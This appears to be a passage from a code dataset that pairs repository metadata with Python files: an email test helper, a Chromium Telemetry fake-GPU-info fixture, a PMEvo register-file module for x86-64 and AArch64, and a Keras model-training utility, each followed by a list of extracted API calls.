pcmp = getcmp(msg1, mcf)
if pcmp is None:
pcmp = getcmp(msg1, self.mime_cmp_factories)
self.assertIsNotNone(
pcmp, 'no comparator for mime-type "%s"' % (msg1.get_content_type(),))
pcmp = pcmp(self, msg1.get_content_type())
try:
pcmp(dat1, dat2)
except AssertionError as err:
raise AssertionError(
        makemsg(msg, context + ' has different payload') + '; ' + str(err))
#----------------------------------------------------------------------------
def try_assertXmlEqual(self, dat1, dat2, msg=None):
if hasattr(self, 'assertXmlEqual'):
return self.assertXmlEqual(dat1, dat2)
return self.assertMultiLineEqual(dat1, dat2)
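#------------------------------------------------------------------------------
# Usage sketch (illustrative, not part of the original module): a TestCase that
# pulls in the mixin and compares two minimal emails. The sample payloads are
# assumptions, not fixtures from this project.
#
# class ExampleEmailTest(EmailTestMixin, unittest.TestCase):
#   def test_identical_emails_compare_equal(self):
#     eml = 'Content-Type: text/plain\n\nhello, world\n'
#     self.assertEmailEqual(eml, eml)
#     self.assertNotEmailEqual(eml, 'Content-Type: text/plain\n\nbye\n')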
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------
| [((88, 11, 88, 41), 'email.message_from_string', 'email.message_from_string', ({(88, 37, 88, 40): 'eml'}, {}), '(eml)', False, 'import unittest, email\n')] |
tingshao/catapult | telemetry/telemetry/testing/internal/fake_gpu_info.py | a8fe19e0c492472a8ed5710be9077e24cc517c5c | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This dictionary of GPU information was captured from a run of
# Telemetry on a Linux workstation with NVIDIA GPU. It helps test
# telemetry.internal.platform's GPUInfo class, and specifically the
# attributes it expects to find in the dictionary; if the code changes
# in an incompatible way, tests using this fake GPU info will begin
# failing, indicating this fake data must be updated.
#
# To regenerate it, import pdb in
# telemetry/internal/platform/gpu_info.py and add a call to
# pdb.set_trace() in GPUInfo.FromDict before the return statement.
# Print the attrs dictionary in the debugger and copy/paste the result
# on the right-hand side of this assignment. Then run:
#
# pyformat [this file name] | sed -e "s/'/'/g"
#
# and put the output into this file.
FAKE_GPU_INFO = {
'feature_status':
{
'flash_stage3d': 'enabled',
'gpu_compositing': 'enabled',
'video_decode': 'unavailable_software',
'flash_3d': 'enabled',
'webgl': 'enabled',
'video_encode': 'enabled',
'multiple_raster_threads': 'enabled_on',
'2d_canvas': 'unavailable_software',
'rasterization': 'disabled_software',
'flash_stage3d_baseline': 'enabled'
},
'aux_attributes':
{
'optimus': False,
'sandboxed': True,
'basic_info_state': 1,
'adapter_luid': 0.0,
'driver_version': '331.79',
'direct_rendering': True,
'amd_switchable': False,
'context_info_state': 1,
'process_crash_count': 0,
'pixel_shader_version': '4.40',
'gl_ws_version': '1.4',
'can_lose_context': False,
'driver_vendor': 'NVIDIA',
'max_msaa_samples': '64',
'software_rendering': False,
'gl_version': '4.4.0 NVIDIA 331.79',
'gl_ws_vendor': 'NVIDIA Corporation',
'vertex_shader_version': '4.40',
'initialization_time': 1.284043,
'gl_reset_notification_strategy': 33362,
'gl_ws_extensions':
'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig '
'GLX_SGIX_pbuffer GLX_SGI_video_sync GLX_SGI_swap_control '
'GLX_EXT_swap_control GLX_EXT_swap_control_tear '
'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age '
'GLX_ARB_create_context GLX_ARB_create_context_profile '
'GLX_EXT_create_context_es_profile '
'GLX_EXT_create_context_es2_profile '
'GLX_ARB_create_context_robustness GLX_ARB_multisample '
'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group'
' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage '
'GLX_NV_copy_image GLX_NV_video_capture ',
'gl_renderer': 'Quadro 600/PCIe/SSE2',
'driver_date': '',
'gl_vendor': 'NVIDIA Corporation',
'gl_extensions':
'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays '
'GL_ARB_base_instance GL_ARB_blend_func_extended '
'GL_ARB_buffer_storage GL_ARB_clear_buffer_object '
'GL_ARB_clear_texture GL_ARB_color_buffer_float '
'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage'
' GL_ARB_conservative_depth GL_ARB_compute_shader '
'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer '
'GL_ARB_copy_image GL_ARB_debug_output '
'GL_ARB_depth_buffer_float GL_ARB_depth_clamp '
'GL_ARB_depth_texture GL_ARB_draw_buffers '
'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect '
'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced '
'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility '
'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location '
'GL_ARB_explicit_uniform_location '
'GL_ARB_fragment_coord_conventions '
'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program '
'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader '
'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object '
'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 '
'GL_ARB_get_program_binary GL_ARB_gpu_shader5 '
'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel '
'GL_ARB_half_float_vertex GL_ARB_imaging '
'GL_ARB_indirect_parameters GL_ARB_instanced_arrays '
'GL_ARB_internalformat_query GL_ARB_internalformat_query2 '
'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment '
'GL_ARB_map_buffer_range GL_ARB_multi_bind '
'GL_ARB_multi_draw_indirect GL_ARB_multisample '
'GL_ARB_multitexture GL_ARB_occlusion_query '
'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object '
'GL_ARB_point_parameters GL_ARB_point_sprite '
'GL_ARB_program_interface_query GL_ARB_provoking_vertex '
'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness '
'GL_ARB_sample_shading GL_ARB_sampler_objects '
'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects '
'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding '
'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote '
'GL_ARB_shader_image_load_store GL_ARB_shader_image_size '
'GL_ARB_shader_objects GL_ARB_shader_precision '
'GL_ARB_query_buffer_object '
'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine'
' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 '
'GL_ARB_shading_language_420pack '
'GL_ARB_shading_language_include '
'GL_ARB_shading_language_packing GL_ARB_shadow '
'GL_ARB_stencil_texturing GL_ARB_sync '
'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp '
'GL_ARB_texture_buffer_object '
'GL_ARB_texture_buffer_object_rgb32 '
'GL_ARB_texture_buffer_range GL_ARB_texture_compression '
'GL_ARB_texture_compression_bptc '
'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map '
'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add '
'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar '
'GL_ARB_texture_env_dot3 GL_ARB_texture_float '
'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge '
'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample '
'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels '
'GL_ARB_texture_query_lod GL_ARB_texture_rectangle '
'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui '
'GL_ARB_texture_stencil8 GL_ARB_texture_storage '
'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle '
'GL_ARB_texture_view GL_ARB_timer_query '
'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 '
'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix '
'GL_ARB_uniform_buffer_object GL_ARB_vertex_array_bgra '
'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit '
'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object '
'GL_ARB_vertex_program GL_ARB_vertex_shader '
'GL_ARB_vertex_type_10f_11f_11f_rev '
'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array '
'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float '
'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add'
' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform '
'GL_EXT_blend_color GL_EXT_blend_equation_separate '
'GL_EXT_blend_func_separate GL_EXT_blend_minmax '
'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array '
'GL_EXT_Cg_shader GL_EXT_depth_bounds_test '
'GL_EXT_direct_state_access GL_EXT_draw_buffers2 '
'GL_EXT_draw_instanced GL_EXT_draw_range_elements '
'GL_EXT_fog_coord GL_EXT_framebuffer_blit '
'GL_EXT_framebuffer_multisample '
'GL_EXTX_framebuffer_mixed_formats '
'GL_EXT_framebuffer_multisample_blit_scaled '
'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB '
'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters '
'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays '
'GL_EXT_packed_depth_stencil GL_EXT_packed_float '
'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object '
'GL_EXT_point_parameters GL_EXT_provoking_vertex '
'GL_EXT_rescale_normal GL_EXT_secondary_color '
'GL_EXT_separate_shader_objects '
'GL_EXT_separate_specular_color '
'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs '
'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D'
' GL_EXT_texture_array GL_EXT_texture_buffer_object '
'GL_EXT_texture_compression_dxt1 '
'GL_EXT_texture_compression_latc '
'GL_EXT_texture_compression_rgtc '
'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map '
'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine '
'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic '
'GL_EXT_texture_integer GL_EXT_texture_lod '
'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp '
'GL_EXT_texture_object GL_EXT_texture_shared_exponent '
'GL_EXT_texture_sRGB GL_EXT_texture_sRGB_decode '
'GL_EXT_texture_storage GL_EXT_texture_swizzle '
'GL_EXT_timer_query GL_EXT_transform_feedback2 '
'GL_EXT_vertex_array GL_EXT_vertex_array_bgra '
'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object '
'GL_EXT_import_sync_object GL_IBM_rasterpos_clip '
'GL_IBM_texture_mirrored_repeat GL_KHR_debug '
'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect '
'GL_NV_blend_equation_advanced GL_NV_blend_square '
'GL_NV_compute_program5 GL_NV_conditional_render '
'GL_NV_copy_depth_to_color GL_NV_copy_image '
'GL_NV_depth_buffer_float GL_NV_depth_clamp '
'GL_NV_draw_texture GL_NV_ES1_1_compatibility '
'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer '
'GL_NV_fog_distance GL_NV_fragment_program '
'GL_NV_fragment_program_option GL_NV_fragment_program2 '
'GL_NV_framebuffer_multisample_coverage '
'GL_NV_geometry_shader4 GL_NV_gpu_program4 '
'GL_NV_gpu_program4_1 GL_NV_gpu_program5 '
'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 '
'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent '
'GL_NV_multisample_coverage GL_NV_multisample_filter_hint '
'GL_NV_occlusion_query GL_NV_packed_depth_stencil '
'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2'
' GL_NV_path_rendering GL_NV_pixel_data_range '
'GL_NV_point_sprite GL_NV_primitive_restart '
'GL_NV_register_combiners GL_NV_register_combiners2 '
'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float '
'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object '
'GL_ARB_sparse_texture GL_NV_texgen_reflection '
'GL_NV_texture_barrier GL_NV_texture_compression_vtc '
'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal '
'GL_NV_texture_multisample GL_NV_texture_rectangle '
'GL_NV_texture_shader GL_NV_texture_shader2 '
'GL_NV_texture_shader3 GL_NV_transform_feedback '
'GL_NV_transform_feedback2 GL_NV_vdpau_interop '
'GL_NV_vertex_array_range GL_NV_vertex_array_range2 '
'GL_NV_vertex_attrib_integer_64bit '
'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program '
'GL_NV_vertex_program1_1 GL_NV_vertex_program2 '
'GL_NV_vertex_program2_option GL_NV_vertex_program3 '
'GL_NVX_conditional_render GL_NVX_gpu_memory_info '
'GL_SGIS_generate_mipmap GL_SGIS_texture_lod '
'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum '
},
'devices':
[
{
'device_string': '',
'vendor_id': 4318.0,
'device_id': 3576.0,
'vendor_string': ''
}],
'driver_bug_workarounds':
['clear_uniforms_before_first_program_use',
'disable_gl_path_rendering',
'init_gl_position_in_vertex_shader',
'init_vertex_attributes',
'remove_pow_with_constant_exponent',
'scalarize_vec_and_mat_constructor_args',
'use_current_program_after_successful_link',
'use_virtualized_gl_contexts']
}
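# Usage sketch (illustrative, not part of the original file; assumes the
# telemetry package is importable, per the regeneration notes above):
#
#   from telemetry.internal.platform import gpu_info
#   info = gpu_info.GPUInfo.FromDict(FAKE_GPU_INFO)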
| [] |
qcjiang/pmevo-artifact | vm_setup/pmevo/measurement-server/PITE/register_file.py | bf5da1788f9ede42086c31b3996d9e41363cc7ee | #! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC
from collections import defaultdict
class RegisterFile(ABC):
registers = NotImplemented
def __init__(self):
# for each register kind an index pointing to the next register to use
self.reset_indices()
def reset_indices(self):
self.next_indices = defaultdict(lambda:0)
def get_memory_base(self):
return self.registers["MEM"][0]["64"]
def get_div_register(self):
return self.registers["DIV"][0]["64"]
def get_clobber_list(self):
res = []
for k, v in self.registers.items():
for regset in v:
reg = regset["repr"]
if reg is not None:
res.append(reg)
return res
class X86_64_RegisterFile(RegisterFile):
registers = {
"G": # general purpose registers
[
# {"64": "rax", "32": "eax", "repr": "rax"},
# {"64": "rcx", "32": "ecx", "repr": "rcx"},
# {"64": "rdx", "32": "edx", "repr": "rdx"},
{"64": "rbx", "32": "ebx", "repr": "rbx"}, # used by gcc
# {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc
# {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc
{"64": "rsi", "32": "esi", "repr": "rsi"}, # used for string instructions
{"64": "rdi", "32": "edi", "repr": "rdi"}, # used for string instructions
{"64": "r8", "32": "r8d", "repr": "r8"},
{"64": "r9", "32": "r9d", "repr": "r9"},
{"64": "r10", "32": "r10d", "repr": "r10"},
{"64": "r11", "32": "r11d", "repr": "r11"},
{"64": "r12", "32": "r12d", "repr": "r12"},
# {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register
# {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register
# {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame
],
"V": # vector registers
[
{"256": "ymm0", "128": "xmm0", "repr": "ymm0"},
{"256": "ymm1", "128": "xmm1", "repr": "ymm1"},
{"256": "ymm2", "128": "xmm2", "repr": "ymm2"},
{"256": "ymm3", "128": "xmm3", "repr": "ymm3"},
{"256": "ymm4", "128": "xmm4", "repr": "ymm4"},
{"256": "ymm5", "128": "xmm5", "repr": "ymm5"},
{"256": "ymm6", "128": "xmm6", "repr": "ymm6"},
{"256": "ymm7", "128": "xmm7", "repr": "ymm7"},
{"256": "ymm8", "128": "xmm8", "repr": "ymm8"},
{"256": "ymm9", "128": "xmm9", "repr": "ymm9"},
{"256": "ymm10", "128": "xmm10", "repr": "ymm10"},
{"256": "ymm11", "128": "xmm11", "repr": "ymm11"},
{"256": "ymm12", "128": "xmm12", "repr": "ymm12"},
{"256": "ymm13", "128": "xmm13", "repr": "ymm13"},
{"256": "ymm14", "128": "xmm14", "repr": "ymm14"},
{"256": "ymm15", "128": "xmm15", "repr": "ymm15"},
],
"DIV": # register for non-zero divisor
[
{"64": "r13", "32": "r13d", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "r14", "32": "r14d", "repr": None}
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
class AArch64_RegisterFile(RegisterFile):
registers = {
"G": # general puprose registers
[
# {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame
# {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame
{"64": "x2", "32": "w2", "repr": "x2"},
{"64": "x3", "32": "w3", "repr": "x3"},
{"64": "x4", "32": "w4", "repr": "x4"},
{"64": "x5", "32": "w5", "repr": "x5"},
{"64": "x6", "32": "w6", "repr": "x6"},
{"64": "x7", "32": "w7", "repr": "x7"},
{"64": "x8", "32": "w8", "repr": "x8"},
{"64": "x9", "32": "w9", "repr": "x9"},
{"64": "x10", "32": "w10", "repr": "x10"},
{"64": "x11", "32": "w11", "repr": "x11"},
{"64": "x12", "32": "w12", "repr": "x12"},
{"64": "x13", "32": "w13", "repr": "x13"},
{"64": "x14", "32": "w14", "repr": "x14"},
{"64": "x15", "32": "w15", "repr": "x15"},
{"64": "x16", "32": "w16", "repr": "x16"},
{"64": "x17", "32": "w17", "repr": "x17"},
{"64": "x18", "32": "w18", "repr": "x18"},
{"64": "x19", "32": "w19", "repr": "x19"},
{"64": "x20", "32": "w20", "repr": "x20"},
{"64": "x21", "32": "w21", "repr": "x21"},
{"64": "x22", "32": "w22", "repr": "x22"},
{"64": "x23", "32": "w23", "repr": "x23"},
{"64": "x24", "32": "w24", "repr": "x24"},
{"64": "x25", "32": "w25", "repr": "x25"},
{"64": "x26", "32": "w26", "repr": "x26"},
{"64": "x27", "32": "w27", "repr": "x27"},
# {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory
# {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor
# {"64": "x30", "32": "w30", "repr": "x30"}, # link register
# {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register
],
"F": # vector/floating point registers
[
{"VEC": "v0", "128": "q0", "64": "d0", "32": "s0", "16": "h0", "8": "b0", "repr": "v0"},
{"VEC": "v1", "128": "q1", "64": "d1", "32": "s1", "16": "h1", "8": "b1", "repr": "v1"},
{"VEC": "v2", "128": "q2", "64": "d2", "32": "s2", "16": "h2", "8": "b2", "repr": "v2"},
{"VEC": "v3", "128": "q3", "64": "d3", "32": "s3", "16": "h3", "8": "b3", "repr": "v3"},
{"VEC": "v4", "128": "q4", "64": "d4", "32": "s4", "16": "h4", "8": "b4", "repr": "v4"},
{"VEC": "v5", "128": "q5", "64": "d5", "32": "s5", "16": "h5", "8": "b5", "repr": "v5"},
{"VEC": "v6", "128": "q6", "64": "d6", "32": "s6", "16": "h6", "8": "b6", "repr": "v6"},
{"VEC": "v7", "128": "q7", "64": "d7", "32": "s7", "16": "h7", "8": "b7", "repr": "v7"},
{"VEC": "v8", "128": "q8", "64": "d8", "32": "s8", "16": "h8", "8": "b8", "repr": "v8"},
{"VEC": "v9", "128": "q9", "64": "d9", "32": "s9", "16": "h9", "8": "b9", "repr": "v9"},
{"VEC": "v10", "128": "q10", "64": "d10", "32": "s10", "16": "h10", "8": "b10", "repr": "v10"},
{"VEC": "v11", "128": "q11", "64": "d11", "32": "s11", "16": "h11", "8": "b11", "repr": "v11"},
{"VEC": "v12", "128": "q12", "64": "d12", "32": "s12", "16": "h12", "8": "b12", "repr": "v12"},
{"VEC": "v13", "128": "q13", "64": "d13", "32": "s13", "16": "h13", "8": "b13", "repr": "v13"},
{"VEC": "v14", "128": "q14", "64": "d14", "32": "s14", "16": "h14", "8": "b14", "repr": "v14"},
{"VEC": "v15", "128": "q15", "64": "d15", "32": "s15", "16": "h15", "8": "b15", "repr": "v15"},
{"VEC": "v16", "128": "q16", "64": "d16", "32": "s16", "16": "h16", "8": "b16", "repr": "v16"},
{"VEC": "v17", "128": "q17", "64": "d17", "32": "s17", "16": "h17", "8": "b17", "repr": "v17"},
{"VEC": "v18", "128": "q18", "64": "d18", "32": "s18", "16": "h18", "8": "b18", "repr": "v18"},
{"VEC": "v19", "128": "q19", "64": "d19", "32": "s19", "16": "h19", "8": "b19", "repr": "v19"},
{"VEC": "v20", "128": "q20", "64": "d20", "32": "s20", "16": "h20", "8": "b20", "repr": "v20"},
{"VEC": "v21", "128": "q21", "64": "d21", "32": "s21", "16": "h21", "8": "b21", "repr": "v21"},
{"VEC": "v22", "128": "q22", "64": "d22", "32": "s22", "16": "h22", "8": "b22", "repr": "v22"},
{"VEC": "v23", "128": "q23", "64": "d23", "32": "s23", "16": "h23", "8": "b23", "repr": "v23"},
{"VEC": "v24", "128": "q24", "64": "d24", "32": "s24", "16": "h24", "8": "b24", "repr": "v24"},
{"VEC": "v25", "128": "q25", "64": "d25", "32": "s25", "16": "h25", "8": "b25", "repr": "v25"},
{"VEC": "v26", "128": "q26", "64": "d26", "32": "s26", "16": "h26", "8": "b26", "repr": "v26"},
{"VEC": "v27", "128": "q27", "64": "d27", "32": "s27", "16": "h27", "8": "b27", "repr": "v27"},
{"VEC": "v28", "128": "q28", "64": "d28", "32": "s28", "16": "h28", "8": "b28", "repr": "v28"},
{"VEC": "v29", "128": "q29", "64": "d29", "32": "s29", "16": "h29", "8": "b29", "repr": "v29"},
{"VEC": "v30", "128": "q30", "64": "d30", "32": "s30", "16": "h30", "8": "b30", "repr": "v30"},
{"VEC": "v31", "128": "q31", "64": "d31", "32": "s31", "16": "h31", "8": "b31", "repr": "v31"},
],
"DIV": # register for non-zero divisor
[
{"64": "x29", "32": "w29", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "x28", "32": "w28", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
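if __name__ == "__main__":
    # Smoke-test sketch (an assumption, not part of the original module): dump
    # the helper registers and clobber list of the x86-64 register file.
    rf = X86_64_RegisterFile()
    print("memory base:", rf.get_memory_base())   # expected: r14
    print("divisor reg:", rf.get_div_register())  # expected: r13
    print("clobbers:", ", ".join(rf.get_clobber_list()))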
| [((18, 28, 18, 49), 'collections.defaultdict', 'defaultdict', ({(18, 40, 18, 48): 'lambda : 0'}, {}), '(lambda : 0)', False, 'from collections import defaultdict\n')] |
JoseLuisRojasAranda/tfmodels | src/training_utils/training.py | 56dce0236f0cc03dd7031aecf305d470c9fb97a9 | import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Keras API imports
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Model callback imports
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Imports for plotting the training progress
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
def continue_training(path_to_model, dataset):
if not path.exists(path_to_model):
print("[ERROR] El path a la carpeta del modelo no existe")
return
    # load the model setup
setup = None
with open(path_to_model+"setup.json", "r") as data:
setup = json.load(data)
    # load the training state
state = None
with open(path_to_model+"checkpoints/"+"training_state.json", "r") as data:
state = json.load(data)
print("[INFO] Continuando entrenameinto de modelo.")
    # load the model
model_name = "model_checkpoint_{}.h5".format(state["epoch"]-1)
model = tf.keras.models.load_model(path_to_model+"checkpoints/"+model_name)
    # recompile the model
opt = Adam(lr=state["learning_rate"])
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], initial_epoch=state["epoch"],
path=setup["path"], continue_train=True, classes=setup["classes"])
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
def train_model(setup, model, dataset):
    # Make sure the output path exists
if not path.exists(setup["path"]):
os.makedirs(setup["path"])
else:
        # Delete the folders if they already exist
if path.exists(setup["path"]+"checkpoints"):
shutil.rmtree(setup["path"]+"checkpoints")
if path.exists(setup["path"]+"logs"):
shutil.rmtree(setup["path"]+"logs")
    # create the folder where the checkpoints will be saved
if not path.exists(setup["path"]+"checkpoints"):
os.mkdir(setup["path"] + "checkpoints")
    # Write the training setup to disk
with open(setup["path"]+"setup.json", "w") as writer:
json.dump(setup, writer, indent=4)
print("[INFO] Entrenando modelo.")
    # Plot the model architecture
plot_model(model, to_file=setup["path"]+"model_architecture.png",
show_shapes=True, show_layer_names=True, expand_nested=False)
    # Create the optimizer, Adam by default
opt = Adam(lr=setup["learning_rate"])
#opt = RMSprop(lr=setup["learning_rate"])
    # Compile the model
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], path=setup["path"], classes=setup["classes"])
# Method that trains an already compiled model; it wires up TensorBoard
# callbacks, CSV file logging and checkpoint creation whenever the loss
# improves, and also plots the metrics and builds a confusion matrix
# Args:
# compiled_model: keras.Model ya compilado
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predict
def fit_model(compiled_model=None, # El modelo debe de estar complicado
dataset=None,
opt=None,
epochs=None,
initial_epoch=0,
path=None,
continue_train=False,
classes=None):
    # unpack the dataset
train, test = dataset
    # Callbacks used during training
relative = 0
if initial_epoch >= 1:
relative = initial_epoch
callbacks = [
#TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative),
CSVLogger(path+"training_log.csv", append=continue_train),
TensorBoard(log_dir=path+"logs")
]
    # Train the model
history = compiled_model.fit(train, initial_epoch=initial_epoch, epochs=epochs,
callbacks=callbacks, validation_data=test)
    # Save the model
print("[INFO] Serializing model.")
compiled_model.save(path + "model.h5")
    # Plot the training metrics
graph_model_metrics(csv_path=path+"training_log.csv",
img_path=path+"metrics_graph.png")
    # Build the confusion matrix
    if test is not None:
        print("[INFO] Building confusion matrix")
graph_confusion_matrix(model=compiled_model, test_dataset=test,
classes=classes, path=path+"confusion_matrix.png")
def load_model(path):
model = tf.keras.models.load_model(path + "model.h5")
with open(path + "setup.json", "r") as data:
setup = json.load(data)
return model, setup["classes"]
| [((45, 12, 45, 79), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', ({(45, 39, 45, 78): "path_to_model + 'checkpoints/' + model_name"}, {}), "(path_to_model + 'checkpoints/' + model_name)", True, 'import tensorflow as tf\n'), ((48, 10, 48, 41), 'tensorflow.keras.optimizers.Adam', 'Adam', (), '', False, 'from tensorflow.keras.optimizers import Adam, RMSprop\n'), ((83, 4, 84, 73), 'tensorflow.keras.utils.plot_model', 'plot_model', (), '', False, 'from tensorflow.keras.utils import plot_model\n'), ((87, 10, 87, 41), 'tensorflow.keras.optimizers.Adam', 'Adam', (), '', False, 'from tensorflow.keras.optimizers import Adam, RMSprop\n'), ((138, 4, 139, 46), 'training_utils.training_graphs.graph_model_metrics', 'graph_model_metrics', (), '', False, 'from training_utils.training_graphs import graph_model_metrics\n'), ((148, 12, 148, 57), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', ({(148, 39, 148, 56): "path + 'model.h5'"}, {}), "(path + 'model.h5')", True, 'import tensorflow as tf\n'), ((27, 11, 27, 37), 'os.path.exists', 'path.exists', ({(27, 23, 27, 36): 'path_to_model'}, {}), '(path_to_model)', False, 'from os import path\n'), ((34, 16, 34, 31), 'json.load', 'json.load', ({(34, 26, 34, 30): 'data'}, {}), '(data)', False, 'import json\n'), ((39, 16, 39, 31), 'json.load', 'json.load', ({(39, 26, 39, 30): 'data'}, {}), '(data)', False, 'import json\n'), ((62, 11, 62, 37), 'os.path.exists', 'path.exists', ({(62, 23, 62, 36): "setup['path']"}, {}), "(setup['path'])", False, 'from os import path\n'), ((63, 8, 63, 34), 'os.makedirs', 'os.makedirs', ({(63, 20, 63, 33): "setup['path']"}, {}), "(setup['path'])", False, 'import os\n'), ((66, 11, 66, 51), 'os.path.exists', 'path.exists', ({(66, 23, 66, 50): "(setup['path'] + 'checkpoints')"}, {}), "(setup['path'] + 'checkpoints')", False, 'from os import path\n'), ((69, 11, 69, 44), 'os.path.exists', 'path.exists', ({(69, 23, 69, 43): "(setup['path'] + 'logs')"}, {}), "(setup['path'] + 'logs')", False, 'from os import path\n'), ((73, 11, 73, 51), 'os.path.exists', 'path.exists', ({(73, 23, 73, 50): "(setup['path'] + 'checkpoints')"}, {}), "(setup['path'] + 'checkpoints')", False, 'from os import path\n'), ((74, 8, 74, 47), 'os.mkdir', 'os.mkdir', ({(74, 17, 74, 46): "(setup['path'] + 'checkpoints')"}, {}), "(setup['path'] + 'checkpoints')", False, 'import os\n'), ((78, 8, 78, 42), 'json.dump', 'json.dump', (), '', False, 'import json\n'), ((125, 8, 125, 65), 'tensorflow.keras.callbacks.CSVLogger', 'CSVLogger', (), '', False, 'from tensorflow.keras.callbacks import CSVLogger, TensorBoard\n'), ((126, 8, 126, 40), 'tensorflow.keras.callbacks.TensorBoard', 'TensorBoard', (), '', False, 'from tensorflow.keras.callbacks import CSVLogger, TensorBoard\n'), ((144, 8, 145, 66), 'training_utils.training_graphs.graph_confusion_matrix', 'graph_confusion_matrix', (), '', False, 'from training_utils.training_graphs import graph_confusion_matrix\n'), ((150, 16, 150, 31), 'json.load', 